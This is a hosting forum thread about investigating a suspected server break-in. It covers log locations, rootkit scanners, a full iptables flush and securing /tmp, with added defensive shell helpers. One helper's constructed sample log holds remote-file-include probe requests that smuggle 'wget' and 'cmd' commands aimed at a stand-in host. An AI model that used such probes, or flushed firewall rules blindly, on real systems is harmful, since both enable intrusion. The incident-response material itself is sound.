KillaH425

Registered
Oct 4, 2006
I am fairly sure that someone has hacked into our server, either by exploit or by guessing our password. I want to find the logs of the FTP access, but I can't get them through cPanel. I downloaded the main file and it brings up a command prompt, and then in the FTP Manager section I can't access the links at the bottom because they don't exist. Any suggestions?!
 

designeru

Well-Known Member
Nov 2, 2005
Hint!

Try logging in to your console (ssh), go to /var/log and search there:

- xferlog - ftp log
- /usr/local/apache/domlogs/ - search for wget or cmd
- last - the last logins to your server

Don't forget to run rkhunter and chkrootkit.
Also, do a:
# ps -auxf | grep nobody
... to see if there are any started processes.

Go to /tmp and search for any suspicious files.

If "the one" who broke into your server wasn't stupid enough, you won't find a thing.
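The two checks above that can be rehearsed offline (grepping the Apache domlogs for wget/cmd and looking for executables dropped in /tmp) as a small POSIX shell helper. This is an added example, not code from the thread or from cPanel; the domlog lines and the scratch directory it builds are constructed sample data, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the thread): a triage helper built around the
# "search domlogs for wget or cmd" and "look in /tmp" hints. All input below
# is constructed so the script runs without touching a real server.

# Build a constructed Apache combined-format domlog. The two requests from
# 198.51.100.9 imitate the shape of a remote-file-include probe so that the
# filter has something to find; the hosts and paths are invented.
make_sample_domlog() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
203.0.113.5 - - [04/Oct/2006:10:00:01 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Oct/2006:10:00:02 -0500] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Oct/2006:10:05:17 -0500] "GET /gallery/index.php?page=http://example.invalid/c.txt?&cmd=id HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
198.51.100.9 - - [04/Oct/2006:10:05:20 -0500] "GET /gallery/index.php?page=http://example.invalid/c.txt?&cmd=wget%20http://example.invalid/x HTTP/1.1" 200 298 "-" "libwww-perl/5.805"
EOF
  echo "$f"
}

# Print domlog lines whose request mentions wget or cmd (case-insensitive).
# On a cPanel box you would point this at a file under /usr/local/apache/domlogs/.
suspicious_requests() {
  grep -iE 'wget|cmd' "$1"
}

# Number of matching lines, so the result can be checked rather than only read.
count_suspicious_requests() {
  suspicious_requests "$1" | wc -l | tr -d ' '
}

# Build a constructed scratch directory standing in for /tmp: one executable
# file (what a dropped tool looks like) and one ordinary session file.
make_sample_tmp() {
  d=$(mktemp -d)
  printf '#!/bin/sh\necho constructed\n' > "$d/.x"
  chmod 700 "$d/.x"
  printf 'session data\n' > "$d/sess_abc123"
  chmod 600 "$d/sess_abc123"
  echo "$d"
}

# List regular files with the owner-execute bit set directly in a directory.
executables_in_dir() {
  find "$1" -maxdepth 1 -type f -perm -100 -print
}
```

Usage: `log=$(make_sample_domlog); suspicious_requests "$log"` prints the two probe lines, and `executables_in_dir "$(make_sample_tmp)"` prints the one executable. Against a real server, replace the sample builders with the actual domlog path and `/tmp`.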
 

KillaH425

Registered
Oct 4, 2006
How do you log in using SSH? And by the way, cPanel is installed on a local server and not WHM, in case that changes anything. I can still access the console, but I know someone banned IPs and screwed something up, because now nothing works. Thanks.
 

designeru

Well-Known Member
Nov 2, 2005
Advice...

> How do you log in using SSH?
google.com -> putty ssh

This is a small tool that will let you connect to your Unix-based server from any Windows computer.

> I can still access the console, but I know someone banned IPs and screwed something up because now nothing works.

You mean you have direct access to that server? Do
# iptables -F && iptables -F -t nat && iptables -F -t mangle
... if you don't have direct access to the server, ask your seller to do that. You will need ROOT ACCESS to do that, then log in from a Windows PC via SSH.
 

KillaH425

Registered
Oct 4, 2006
I am pretty positive this route would take weeks, as it isn't hosted by a company. Instead it is hosted by someone who is hard to contact. I was hoping for an easier method.
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
Minneapolis, MN
KillaH425 said:
> I am pretty positive this route would take weeks, as it isn't hosted by a company. Instead it is hosted by someone who is hard to contact. I was hoping for an easier method.

If you are hosting your web site, you'll have to contact your host for help. If you have a dedicated server and need help, contact your Data Center, or seek professional help.
 

Danny_T

Well-Known Member
Jul 19, 2005
Netherlands
The /scripts/securetmp script will stop a lot of hack attempts, or at least they can't run executables out of the tmp dirs. On a webhosting system there are always a lot of PHP applications that are leaky. Many webmasters don't update their PHP applications in time, or not at all.
Now I see a lot of weird executables in my tmp dirs, but they are not started anymore :) That saved a lot of trouble, hehe.

I only miss securing the shm device in that script (box is FC).

Danny.
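A way to verify what Danny describes, i.e. whether /tmp and /var/tmp carry the noexec,nosuid options that /scripts/securetmp sets and whether /dev/shm (which he notes the script leaves out) does too. This is an added example, not code from the thread or from cPanel; the mount table is constructed in /proc/mounts format, and the function names are my own. On a live box you would pass it `cat /proc/mounts` instead.

```shell
#!/bin/sh
# Added example (not from the thread): report whether the usual scratch
# filesystems are mounted noexec,nosuid. SAMPLE_MOUNTS is constructed data
# in /proc/mounts layout: device, mountpoint, fstype, options, dump, pass.
# /tmp and /var/tmp are shown as securetmp leaves them; /dev/shm is left
# as a plain tmpfs so the missing options are visible in the report.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/usr/tmpDSK /tmp ext3 rw,noexec,nosuid,loop 0 0
/tmp /var/tmp none rw,noexec,nosuid,bind 0 0
tmpfs /dev/shm tmpfs rw 0 0'

# mount_opts MOUNTS_TEXT MOUNTPOINT -> the options column for that mountpoint
# (empty output if the directory is not a mountpoint of its own).
mount_opts() {
  printf '%s\n' "$1" | awk -v mp="$2" '$2 == mp { print $4 }'
}

# has_opt OPTS OPTION -> success if OPTION appears in the comma-separated list.
has_opt() {
  case ",$1," in
    *",$2,"*) return 0 ;;
    *) return 1 ;;
  esac
}

# check_tmp_mount MOUNTS_TEXT MOUNTPOINT -> prints "ok", or which of
# noexec/nosuid are missing; returns non-zero when something is wrong.
check_tmp_mount() {
  opts=$(mount_opts "$1" "$2")
  if [ -z "$opts" ]; then
    echo "not a separate mount"
    return 1
  fi
  missing=""
  for want in noexec nosuid; do
    has_opt "$opts" "$want" || missing="$missing $want"
  done
  if [ -z "$missing" ]; then
    echo "ok"
  else
    echo "missing:$missing"
    return 1
  fi
}

# report MOUNTS_TEXT -> one status line per scratch location.
report() {
  for mp in /tmp /var/tmp /dev/shm; do
    printf '%s: %s\n' "$mp" "$(check_tmp_mount "$1" "$mp" || true)"
  done
}
```

Running `report "$SAMPLE_MOUNTS"` prints `ok` for /tmp and /var/tmp and `missing: noexec nosuid` for /dev/shm; `report "$(cat /proc/mounts)"` gives the same report for the machine you are sitting on.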